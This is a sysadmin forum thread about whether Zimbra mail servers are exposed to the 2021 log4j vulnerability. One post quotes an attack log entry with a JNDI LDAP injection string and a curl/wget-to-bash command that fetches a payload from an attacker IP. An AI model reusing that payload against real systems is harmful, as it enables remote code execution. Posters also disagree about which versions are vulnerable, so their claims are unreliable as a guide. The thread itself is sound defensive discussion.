Zimbra not affected by log4j (CVE-2021-44228)
After intensive review and testing, Zimbra Development determined that the 0-day exploit vulnerability for log4j (CVE-2021-44228) does not affect the current Supported Zimbra versions (9.0.0 & 8.8.15). Zimbra Collaboration Server currently uses log4j1 version 1.2.16 which doesn't contain the lookup expression feature that is found within versions 2.0 to 2.17, which is the cause of the vulnerability. Also, Redhat (CVE-2021-4104) vulnerability does not affect the Zimbra Collaboration Server version (8.8.15 & 9.0.0). For this vulnerability to affect the server, it needs JMSAppender, which the ZCS Server does not use, and the ability to append configuration files.

log4j-zero-day exploit - active attacks

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
irv
Posts: 6
Joined: Mon Jun 04, 2018 12:04 am

log4j-zero-day exploit - active attacks

Postby irv » Fri Dec 10, 2021 9:37 pm

Hi

Need for confirmation. Zimbra used log4j - and now I got alert from CVE with threat 10/10.
If and if yes, to what extend and what version of Zimbra servers are affected.



https://wiki.zimbra.com/wiki/Using_log4 ... xd_Logging

about exploit:
"unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1"

https://www.bleepingcomputer.com/news/s ... nightmare/

how this is working:
https://www.lunasec.io/docs/blog/log4j-zero-day/


User avatar
JDunphy
Outstanding Member
Outstanding Member
Posts: 682
Joined: Fri Sep 12, 2014 11:18 pm
Location: Victoria, BC
ZCS/ZD Version: 8.8.15_P28 RHEL8 Network Edition
Contact:

Re: log4j-zero-day exploit - active attacks

Postby JDunphy » Fri Dec 10, 2021 9:52 pm

I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking ip's for ipset's, etc. GreyNoise is providing these in real-time of ip's that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim
pixelplumber
Advanced member
Advanced member
Posts: 52
Joined: Fri Sep 12, 2014 10:27 pm

Re: log4j-zero-day exploit - active attacks

Postby pixelplumber » Fri Dec 10, 2021 9:58 pm

This post on confluence community also suggests ver. 1.x not vulnerable to the JNDI exploit, but I can't verify that.

Looking for log4j all I can see is:

Code: Select all

# find / -name *log4j*
/opt/zimbra/common/jetty_home/modules/logging-log4j.mod
/opt/zimbra/common/jetty_home/modules/logging-log4j2.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j2.mod
/opt/zimbra/common/jetty_home/modules/log4j2-slf4j.mod
/opt/zimbra/common/jetty_home/modules/log4j-impl
/opt/zimbra/common/jetty_home/modules/log4j-impl/resources/log4j.xml
/opt/zimbra/common/jetty_home/modules/log4j-impl.mod
/opt/zimbra/common/jetty_home/modules/log4j2-api.mod
/opt/zimbra/common/jetty_home/modules/log4j2-impl
/opt/zimbra/common/jetty_home/modules/log4j2-impl/resources/log4j2.xml
/opt/zimbra/common/jetty_home/modules/log4j2-impl.mod
/opt/zimbra/conf/log4j.properties.in
/opt/zimbra/conf/milter.log4j.properties
/opt/zimbra/conf/zmconfigd.log4j.properties
/opt/zimbra/conf/log4j.properties
/opt/zimbra/lib/jars/apache-log4j-extras-1.0.jar
/opt/zimbra/lib/jars/slf4j-log4j12-1.7.30.jar
/opt/zimbra/lib/jars/log4j-1.2.16.jar
/opt/zimbra/lib/jars/syslog4j-0.9.46.jar
/opt/zimbra/log/zmconfigd-log4j.log
irv
Posts: 6
Joined: Mon Jun 04, 2018 12:04 am

Re: log4j-zero-day exploit - active attacks

Postby irv » Fri Dec 10, 2021 10:02 pm

Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?

Thanks.



JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking ip's for ipset's, etc. GreyNoise is providing these in real-time of ip's that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim
pixelplumber
Advanced member
Advanced member
Posts: 52
Joined: Fri Sep 12, 2014 10:27 pm

Re: log4j-zero-day exploit - active attacks

Postby pixelplumber » Fri Dec 10, 2021 10:04 pm

JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
Jim

In Jim's link to the hashes above, they mention 1.x might be vulnerable too with a link to this github issue mentioning an avenue lookups could be triggered?
sigtrap
Posts: 5
Joined: Sat Sep 13, 2014 1:35 am

Re: log4j-zero-day exploit - active attacks

Postby sigtrap » Fri Dec 10, 2021 10:19 pm

irv wrote:Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?

Thanks.


I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)
irv
Posts: 6
Joined: Mon Jun 04, 2018 12:04 am

Re: log4j-zero-day exploit - active attacks

Postby irv » Fri Dec 10, 2021 10:36 pm

45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwg(......)}"
(curl -s 45.155.205.233:5874/(cut):80||wget -q -O- 45.155.205.233:5874/(cut):80)|bash

I found that, so looks like they are trying.

I think fail2ban on firewall + log monitoring can help tempolary to cut of that attacks.






sigtrap wrote:
irv wrote:Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?

Thanks.


I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)
PL123
Posts: 3
Joined: Fri Dec 10, 2021 10:59 pm

Re: log4j-zero-day exploit - active attacks

Postby PL123 » Fri Dec 10, 2021 11:03 pm

Can confirm Zimbra 8.8.15_GA_4177 is vulnerable as well.
User avatar
L. Mark Stone
Elite member
Elite member
Posts: 2309
Joined: Wed Oct 09, 2013 11:35 am
Location: Portland, Maine, US
ZCS/ZD Version: 8.8.15 Network Edition
Contact:

Re: log4j-zero-day exploit - active attacks

Postby L. Mark Stone » Fri Dec 10, 2021 11:12 pm

I opened a Support Case with Zimbra on this earlier today. Zimbra have reported back to me that the 1.2.16 version of Log4j used by Zimbra is NOT subject to this exploit.

If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.

All the best,
Mark
___________________________________
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner https://www.missioncriticalemail.com/
Zeta Alliance http://www.zetalliance.org/
PL123
Posts: 3
Joined: Fri Dec 10, 2021 10:59 pm

Re: log4j-zero-day exploit - active attacks

Postby PL123 » Fri Dec 10, 2021 11:31 pm

L. Mark Stone wrote:If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.


I don't see an option to send you a PM. Might be as my account is new or something. Am happy to send you infos to replicate it yourself.

Return to “Administrators”

Who is online

Users browsing this forum: Google [Bot] and 34 guests